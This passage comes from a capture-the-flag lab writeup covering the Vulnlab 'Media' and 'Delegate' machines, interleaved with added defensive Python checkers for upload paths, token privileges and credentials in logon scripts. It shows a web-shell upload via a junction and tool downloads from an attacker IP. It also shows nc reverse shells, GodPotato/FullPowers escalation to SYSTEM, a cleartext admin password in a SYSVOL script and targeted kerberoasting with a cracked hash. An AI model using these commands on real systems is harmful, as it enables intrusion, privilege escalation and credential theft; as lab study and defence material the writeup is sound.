enox@MEDIA C:\Windows\Tasks\Uploads>rmdir 1bad4a5f2408292f03b2bfc5a1edd51d

enox@MEDIA C:\Windows\Tasks\Uploads>cd C:\xampp\htdocs

enox@MEDIA C:\xampp\htdocs>mklink /J C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d C:\xampp\htdocs
Junction created for C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d <<===>> C:\xampp\htdocs

enox@MEDIA C:\xampp\htdocs>mkdir c:\temp

enox@MEDIA C:\xampp\htdocs>cd c:\temp

enox@MEDIA c:\temp> powershell                                      
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp>  iwr http://10.8.2.138/nc64.exe -outfile nc64.exe
PS C:\temp>  iwr http://10.8.2.138/FullPowers.exe -outfile FullPowers.exe 
PS C:\temp> iwr http://10.8.2.138/GodPotato.exe -outfile gp.exe
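The index.php handler shown above derives the upload folder from the visitor's own form fields (md5 of first name, last name and e-mail), creates it world-writable under C:\Windows\Tasks\Uploads, and keeps whatever extension the client sent; the mklink /J step works because nothing checks that the folder is a real directory inside the base path. As an added example (not the box's code and not from the writeup), here is that path logic rewritten in Python with the missing checks: the folder must be a plain 32-hex name, must not be a symlink or junction, must resolve to a location inside the base directory, and only allow-listed video extensions are accepted under a server-chosen file name. The allow-list, the function names and the demo layout are assumptions made for this example.

```python
import hashlib
import os
import re
import secrets

# Added example, not the box's index.php: the upload-path logic rewritten in
# Python with the checks the PHP handler is missing. Function names, the
# allow-list and the demo layout are assumptions made for this example.

# Assumed allow-list for a "submit your video" form; .php never passes.
ALLOWED_EXTENSIONS = {".mp4", ".mov", ".webm"}


def _is_reparse_point(path):
    """True for a symlink and, on Python 3.12+ under Windows, also for an
    NTFS junction such as the one created above with mklink /J."""
    isjunction = getattr(os.path, "isjunction", None)
    return os.path.islink(path) or (isjunction is not None and isjunction(path))


def resolve_upload_dir(base_dir, folder_name):
    """Return the real path of base_dir/folder_name, or None when it is unsafe.

    Unsafe means: the folder name is not the 32-hex md5 the application
    generates, the folder is a symlink/junction, or its resolved location is
    not inside base_dir.
    """
    if not re.fullmatch(r"[0-9a-f]{32}", folder_name):
        return None
    base_real = os.path.realpath(base_dir)
    candidate = os.path.join(base_real, folder_name)
    if _is_reparse_point(candidate):
        return None
    target_real = os.path.realpath(candidate)
    # commonpath rather than startswith(): "Uploads-old" must not pass as "Uploads"
    if os.path.commonpath([base_real, target_real]) != base_real:
        return None
    return target_real


def safe_target_file(base_dir, folder_name, original_filename):
    """Combine the directory check with an extension allow-list and a
    server-chosen file name, so the client controls neither the directory
    the file lands in nor the name it is served under."""
    upload_dir = resolve_upload_dir(base_dir, folder_name)
    if upload_dir is None:
        return None
    ext = os.path.splitext(original_filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return None
    return os.path.join(upload_dir, secrets.token_hex(16) + ext)


def demo():
    """Constructed layout, not the box: one honest upload folder and one folder
    replaced by a symlink into the web root (standing in for mklink /J)."""
    import tempfile
    tmp = tempfile.mkdtemp()
    base = os.path.join(tmp, "Uploads")
    webroot = os.path.join(tmp, "htdocs")
    os.makedirs(base)
    os.makedirs(webroot)
    honest = hashlib.md5(b"JohnDoejohn@example.com").hexdigest()  # md5(first+last+email), as in index.php
    os.makedirs(os.path.join(base, honest))
    hijacked = hashlib.md5(b"EvilUsereve@example.com").hexdigest()
    os.symlink(webroot, os.path.join(base, hijacked))  # the redirect the writeup achieves with a junction
    return {
        "honest_dir_ok": resolve_upload_dir(base, honest) is not None,
        "hijacked_dir_rejected": resolve_upload_dir(base, hijacked) is None,
        "traversal_rejected": resolve_upload_dir(base, "../htdocs") is None,
        "php_rejected": safe_target_file(base, honest, "shell.php") is None,
        "video_accepted": safe_target_file(base, honest, "intro.MP4") is not None,
    }
```

demo() builds a throwaway layout with a symlink standing in for the junction and reports which checks fired. On Windows, os.path.realpath has resolved junctions since Python 3.8, so the commonpath test alone already catches the redirect into htdocs; the explicit reparse-point test additionally rejects a junction that points somewhere inside the base directory. Moving the upload root out of a location that low-privileged local users can write to removes the root cause.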

upload the shell.php again (with the same name) on the website http://media.vl

trigger the shell

┌──(puck㉿kali)-[~/vulnlab/media]
└─$ curl http://media.vl/shell.php?cmd=c:\\temp\\nc64.exe+-e+cmd.exe+10.8.2.138+443

┌──(puck㉿kali)-[~/.john]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50353
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs>whoami /all
whoami /all

USER INFORMATION
----------------

User Name                  SID     
========================== ========
nt authority\local service S-1-5-19


GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                                                              Attributes                                        
====================================== ================ ================================================================================================ ==================================================
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                                                                                                       
Everyone                               Well-known group S-1-1-0                                                                                          Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                                                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                   Well-known group S-1-5-6                                                                                          Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                                                          Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                                                                         Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0                                                                                          Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-1488445330-856673777-1515413738-1380768593-2977925950-2228326386-886087428-2802422674   Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263 Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State   
============================= =================================== ========
SeTcbPrivilege                Act as part of the operating system Disabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled 
SeCreateGlobalPrivilege       Create global objects               Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set      Disabled
SeTimeZonePrivilege           Change the time zone                Disabled


C:\xampp\htdocs>cd c:\temp
cd c:\temp

c:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> ./FullPowers.exe -c "C:\temp\nc64.exe 10.8.2.138 443 -e cmd" -z
./FullPowers.exe -c "C:\temp\nc64.exe 10.8.2.138 443 -e cmd" -z
[+] Started dummy thread with id 4104
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
PS C:\temp> 

with another listener running

┌──(puck㉿kali)-[~/vulnlab/media]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50388
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name                  SID     
========================== ========
nt authority\local service S-1-5-19


GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                                                              Attributes                                        
====================================== ================ ================================================================================================ ==================================================
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                                                                                                       
Everyone                               Well-known group S-1-1-0                                                                                          Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                                                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                   Well-known group S-1-5-6                                                                                          Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                                                          Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                                                                         Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-87-343222087-845000640-1675840783-1352364494-2876961185                                    Enabled by default, Enabled group, Group owner    
LOCAL                                  Well-known group S-1-2-0                                                                                          Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-1488445330-856673777-1515413738-1380768593-2977925950-2228326386-886087428-2802422674   Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263 Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State  
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled


C:\Windows\system32>cd c:\temp 
cd c:\temp

c:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp>  .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
 .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
[*] CombaseModule: 0x140703281709056
[*] DispatchTable: 0x140703284300104
[*] UseProtseqFunction: 0x140703283594576
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\4fd8aaea-891f-4482-ad8b-475ee0150221\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00004c02-0f7c-ffff-c191-3eab1219bded
[*] DCOM obj OXID: 0xd4bc6315c97087dc
[*] DCOM obj OID: 0x8e7f990db6fe9b40
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 904 Token:0x740  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 5052
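The three whoami outputs above show the same account, LOCAL SERVICE, with two different privilege sets: the Apache service runs with the reduced token defined by the RequiredPrivileges value on the ApacheHTTPServer service shown earlier (no SeImpersonatePrivilege, no SeAssignPrimaryTokenPrivilege), and FullPowers recovered the account's default set through a scheduled task, which is what GodPotato then needed. As an added example (not from the writeup), a small parser for the PRIVILEGES INFORMATION table and a triage check that lists the privileges worth caring about in a service's token and diffs two captures. The three samples are constructed to mirror the outputs above.

```python
import re

# Added example, not from the writeup: parse the PRIVILEGES INFORMATION table
# printed by `whoami /priv` / `whoami /all` and flag token privileges that let
# a service account reach SYSTEM. The samples are constructed to mirror the
# outputs above (enox, LOCAL SERVICE before FullPowers, and after).

HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate authenticated clients (potato-style abuse)",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeDebugPrivilege": "open any process, including LSASS",
    "SeBackupPrivilege": "read files regardless of ACL",
    "SeRestorePrivilege": "write files regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of securable objects",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

# One row of the table: name, free-text description, then Enabled/Disabled
PRIV_ROW = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)$")

SAMPLE_USER = """
Privilege Name                Description                    State
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

SAMPLE_SERVICE_STRIPPED = """
Privilege Name                Description                         State
============================= =================================== ========
SeTcbPrivilege                Act as part of the operating system Disabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeCreateGlobalPrivilege       Create global objects               Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Disabled
SeTimeZonePrivilege           Change the time zone                Disabled
"""

SAMPLE_SERVICE_FULL = """
Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled
"""


def parse_privileges(text):
    """Map privilege name -> True if Enabled, False if Disabled."""
    privs = {}
    for raw in text.splitlines():
        m = PRIV_ROW.match(raw.strip())
        if m:
            privs[m.group(1)] = m.group(2) == "Enabled"
    return privs


def high_risk(text, include_disabled=True):
    """Disabled privileges count by default: a privilege that is present but
    disabled can be switched on with AdjustTokenPrivileges; only a privilege
    removed from the token is really gone."""
    privs = parse_privileges(text)
    return sorted(p for p, enabled in privs.items()
                  if p in HIGH_RISK and (enabled or include_disabled))


def diff_privileges(before, after):
    """Which privileges appeared or vanished between two captures."""
    b, a = set(parse_privileges(before)), set(parse_privileges(after))
    return {"gained": sorted(a - b), "lost": sorted(b - a)}
```

Run against the two LOCAL SERVICE captures, diff_privileges() shows exactly the four privileges the scheduled-task trick brought back, and high_risk() turns from a single disabled SeTcbPrivilege into the two impersonation privileges. A service that only needs to serve files should be left with the stripped set; the RequiredPrivileges value is the right control, but only if the account cannot create scheduled tasks that run under its own default token.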


and again with another listener running

┌──(puck㉿kali)-[~/.john]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50461
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

C:\temp>whoami
whoami
nt authority\system

C:\temp>hostname
hostname
MEDIA

C:\temp>

That’s it

Tools used on this box:

GodPotato

FullPowers

ntlm_theft

vulnlab-delegate

a hard machine

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ impacket-lookupsid guest@delegate.vl 10000                   
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Brute forcing SIDs at delegate.vl
[*] StringBinding ncacn_np:delegate.vl[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1484473093-3449528695-2030935120
498: DELEGATE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: DELEGATE\Administrator (SidTypeUser)
501: DELEGATE\Guest (SidTypeUser)
502: DELEGATE\krbtgt (SidTypeUser)
512: DELEGATE\Domain Admins (SidTypeGroup)
513: DELEGATE\Domain Users (SidTypeGroup)
514: DELEGATE\Domain Guests (SidTypeGroup)
515: DELEGATE\Domain Computers (SidTypeGroup)
516: DELEGATE\Domain Controllers (SidTypeGroup)
517: DELEGATE\Cert Publishers (SidTypeAlias)
518: DELEGATE\Schema Admins (SidTypeGroup)
519: DELEGATE\Enterprise Admins (SidTypeGroup)
520: DELEGATE\Group Policy Creator Owners (SidTypeGroup)
521: DELEGATE\Read-only Domain Controllers (SidTypeGroup)
522: DELEGATE\Cloneable Domain Controllers (SidTypeGroup)
525: DELEGATE\Protected Users (SidTypeGroup)
526: DELEGATE\Key Admins (SidTypeGroup)
527: DELEGATE\Enterprise Key Admins (SidTypeGroup)
553: DELEGATE\RAS and IAS Servers (SidTypeAlias)
571: DELEGATE\Allowed RODC Password Replication Group (SidTypeAlias)
572: DELEGATE\Denied RODC Password Replication Group (SidTypeAlias)
1000: DELEGATE\DC1$ (SidTypeUser)
1101: DELEGATE\DnsAdmins (SidTypeAlias)
1102: DELEGATE\DnsUpdateProxy (SidTypeGroup)
1104: DELEGATE\A.Briggs (SidTypeUser)
1105: DELEGATE\b.Brown (SidTypeUser)
1106: DELEGATE\R.Cooper (SidTypeUser)
1107: DELEGATE\J.Roberts (SidTypeUser)
1108: DELEGATE\N.Thompson (SidTypeUser)
1121: DELEGATE\delegation admins (SidTypeGroup)
                                          

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ impacket-GetNPUsers delegate.vl/puck -usersfile users.txt -dc-ip dc1.delegate.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[-] User A.Briggs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User b.Brown doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User R.Cooper doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User J.Roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User N.Thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ smbclient //delegate.vl/SYSVOL -U puck             
Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Sep  9 09:52:30 2023
  ..                                  D        0  Sat Aug 26 05:39:25 2023
  delegate.vl                        Dr        0  Sat Aug 26 05:39:25 2023

        5242879 blocks of size 4096. 1960185 blocks available
smb: \> cd delegate.vl\
smb: \delegate.vl\> ls
  .                                   D        0  Sat Aug 26 05:45:45 2023
  ..                                  D        0  Sat Aug 26 05:39:25 2023
  DfsrPrivate                      DHSr        0  Sat Aug 26 05:45:45 2023
  Policies                            D        0  Sat Aug 26 05:39:30 2023
  scripts                             D        0  Sat Aug 26 08:45:24 2023

        5242879 blocks of size 4096. 1960185 blocks available
smb: \delegate.vl\> cd scripts
smb: \delegate.vl\scripts\> ls
  .                                   D        0  Sat Aug 26 08:45:24 2023
  ..                                  D        0  Sat Aug 26 05:45:45 2023
  users.bat                           A      159  Sat Aug 26 08:54:29 2023

        5242879 blocks of size 4096. 1960182 blocks available
smb: \delegate.vl\scripts\> get users.bat
getting file \delegate.vl\scripts\users.bat of size 159 as users.bat (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \delegate.vl\scripts\> 


┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cat users.bat 
rem @echo off
net use * /delete /y
net use v: \\dc1\development 

if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
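users.bat maps drives per user and embeds a domain Administrator password in clear text; every authenticated user can read SYSVOL, so the script is effectively public. As an added example (not part of the writeup), a small scanner over logon-script text that flags the common ways credentials end up in batch files: net use with an inline password (on either side of /user:), cmdkey /pass:, net user with a password, and runas /savecred. The sample script is constructed to mirror the shape of users.bat, with placeholder passwords; secrets are masked in the output so the scanner's report does not become another leak.

```python
import re

# Added example, not from the writeup: flag credentials embedded in logon
# scripts such as the users.bat found in SYSVOL. SAMPLE_SCRIPT is constructed
# to mirror the shape of that script; the passwords are placeholders.

SAMPLE_SCRIPT = r"""rem @echo off
net use * /delete /y
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P@ssw0rd-PLACEHOLDER
cmdkey /add:fileserver /user:svc_backup /pass:P@ssw0rd-PLACEHOLDER
runas /user:CORP\helpdesk /savecred "notepad.exe"
net use x: \\fileserver\share P@ssw0rd-PLACEHOLDER /user:fileserver\svc_share
net user svc_sync P@ssw0rd-PLACEHOLDER /add
"""

# (rule name, pattern). A secret never starts with "/" so a following switch
# is not mistaken for a password. Order matters: first matching rule wins.
CRED_RULES = [
    ("net use, password after /user:",
     re.compile(r"\bnet\s+use\b.*?/user:(?P<user>\S+)\s+(?P<secret>[^/\s]\S*)", re.I)),
    ("net use, password before /user:",
     re.compile(r"\bnet\s+use\s+\S+\s+\\\\\S+\s+(?P<secret>[^/\s]\S*)(?:.*?/user:(?P<user>\S+))?", re.I)),
    ("cmdkey /pass:",
     re.compile(r"\bcmdkey\b(?:.*?/user:(?P<user>\S+))?.*?/pass:(?P<secret>\S+)", re.I)),
    ("net user with inline password",
     re.compile(r"\bnet\s+user\s+(?P<user>\S+)\s+(?P<secret>[^/\s]\S*)", re.I)),
    ("runas /savecred (cached credential, no password in file)",
     re.compile(r"\brunas\b.*?/user:(?P<user>\S+).*?/savecred", re.I)),
]


def mask(secret):
    """Keep two characters so a finding can be matched to the file, hide the rest."""
    if secret is None:
        return None
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def scan_script(text):
    """Return one finding per line that carries a credential pattern."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        for rule, pattern in CRED_RULES:
            m = pattern.search(line)
            if m:
                groups = m.groupdict()
                findings.append({
                    "line": lineno,
                    "rule": rule,
                    "user": groups.get("user"),
                    "secret": mask(groups.get("secret")),
                    # a commented-out line still leaks, but is worth marking
                    "commented": stripped.lower().startswith(("rem ", "::")),
                })
                break
    return findings
```

Pointed at every .bat, .cmd, .vbs and .ps1 under \\<domain>\SYSVOL\<domain>\scripts and Policies, this gives a first pass; the fix for a hit like line 4 is not to hide the script but to rotate the exposed account and replace the mapping with a GPO drive map or a credential that is not a domain Administrator.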

Run BloodHound to get more info

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ bloodhound-python -d delegate.vl -c all -u 'A.Briggs' -p 'P4ssw0rd1#123' -ns 10.10.114.169      
INFO: Found AD domain: delegate.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC1.delegate.vl
INFO: Done in 00M 07S

After uploading the data to BloodHound, we find:

The user A.BRIGGS@DELEGATE.VL has generic write access to the user N.THOMPSON@DELEGATE.VL.

Generic Write access grants you the ability to write to any non-protected attribute on the target object, including “members” for a group, and “serviceprincipalnames” for a user

A targeted kerberoast attack can be performed using targetedKerberoast.py.

targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'
The tool will automatically attempt a targetedKerberoast attack, either on all users or against a specific one if specified in the command line, and then obtain a crackable hash.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd targetedKerberoast                                         
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ ls                       
kerberoastables.txt  LICENSE  README.md  requirements.txt  targetedKerberoast.py
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 -m venv venv
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ ls
kerberoastables.txt  LICENSE  README.md  requirements.txt  targetedKerberoast.py  venv
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ source venv/bin/activate
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ pip3 install -r requirements.txt
Collecting ldap3 (from -r requirements.txt (line 1))
  Using cached ldap3-2.9.1-py2.py3-none-any.whl.metadata (5.4 kB)
--snip---
Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: six, pygments, pycryptodomex, pycryptodome, pycparser, pyasn1, mdurl, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, markdown-it-py, ldap3, Jinja2, cffi, rich, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 markdown-it-py-3.0.0 mdurl-0.1.2 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodome-3.20.0 pycryptodomex-3.20.0 pygments-2.18.0 rich-13.7.1 six-1.16.0
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 targetedKerberoast.py -u 'A.Briggs' -p 'P4ssw0rd1#123' --request-user N.Thompson -d 'delegate.vl'
[*] Starting kerberoast attacks
[*] Attacking user (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$69b5ede798c5c49a1d7fa396a7746c96$2b53511a3c352538045977f5360dfca5bee63e4aa8642cdb9b3f09704ba8eaeef308c38669d23a3f3ba0f374981ae0c77ecddc68af4ac7fe35a3263f3171c4a9161d04c724be976653e9d02492946aa2ad04db3701bceabd2ec47c22949832fe4b94b4e38ca9fec1f93b42780cfc1b30b3c3136595be8f3087139da24876015e017dc5134683647a328496682b1129496ead62ab751f977c58e38599d7fdddce58c76e0054356b06eed9aebecc586e9e2481fa59bf2449b441185fca2c04e5f9f4feeaa0f3520d0193d7478d9fd64ca2e7a23792542765faef51f96ce15e1520b52560a70dc771b97bb3ccb5a1c1f52656e81ea82aa178ba820100cb51a256d5b58771b8653392c8746067729de122f346cc6a12716fa3e45c9ac842c3937313abf104b30aa1224c9aff9816bcf166cae6835a5dda97e3bc7d0d05074bc08c7a1659b6eb577a5a1bdca341c1f80dc438a2d6eea7ff511192dc624248911f392cb776ab76ba723196a322129018fd4458eebcabb425e1fdfdba0a4e2cf0541bef6f43fd6be6cf921acb019d334a2317a3892cfe893a2c1d9fa279272d61ab540a2058102d5fc4c205f70e9a06346de822169ade4b5c7229961142af8ef517f4361559ca16f46cdf214428fe685d6ff76e53ccd7108e03f552974de9a1656c0afcd25bce077ad6ac379ddcee504556821e895f911ed6b8db0356a39f865863fc8458f48d78a1c266715e388c2577b98081e16662594a44e1736f6d37f336b1932ef0752bcfa46f22b70199af44aaa7500b5179fd028afd41c371ed0f3aa7fb982769fb12d89dee3861c595eca50954a1c4cb6652327cc1ab29de1a7858b6c865542a1ad9bfdfb0bb9408f0b1496170e966729b2fadeb07a3f67931558bc42dda3efc556877fb2661a5f4e3bb69ca1aa771d5e692572337c8fc9251edc4f6ddf8cbfaba280e562735e3d95cef97daf397e1df170d211798e2619807fb75c89de3ea8a53ec69f276eeb0e95190b39d3f96a4c08a196149268dae0db766d71b4f22411312f4766f683d0b2f64a1bf1443d302f9bf7fb5b1058aff75327a3f771a261e45f60b904c562f88c2b6261692ccca2e04b0381a9a92c7a0eb0bc0d0aec7f5b26a1ffb374cd4651a7a2f12ffa9672386c0dae6148e1f5fdfa01cc005bed67c28a1f047324bb0e650abff3c3cd727542bc5a83b234b4c7c17fa354fa55e58da3d475fa35bd4ea865bc2eb70d5f9b00b6b386169483c5020172862eded630c5088f7ee121c2e8bc75852770aefe68eadbdffa7268c87af0a6703951b65dfc60a47a063275288c5ebb0bb3524a3fa06bcd5ac1372addd9625a1b61
f49160c266dd6b09ad146ec56f56bed4eccee9f37220ff9c6b25134f2f7d0cecfe20feec300b1932af55b00a71f4ac3eedc818e422fb28b65bfd5e207a86b8b358e775102c2421e27072a
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ 

....

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ john -w:/usr/share/wordlists/rockyou.txt hash.txt      
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
KALEB_2341       (?)     
1g 0:00:00:03 DONE (2024-06-10 12:40) 0.2695g/s 2966Kp/s 2966Kc/s 2966KC/s KANECHA1..KABYLS3427
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ crackmapexec ldap delegate.vl -u 'N.Thompson' -p 'KALEB_2341' -M maq  
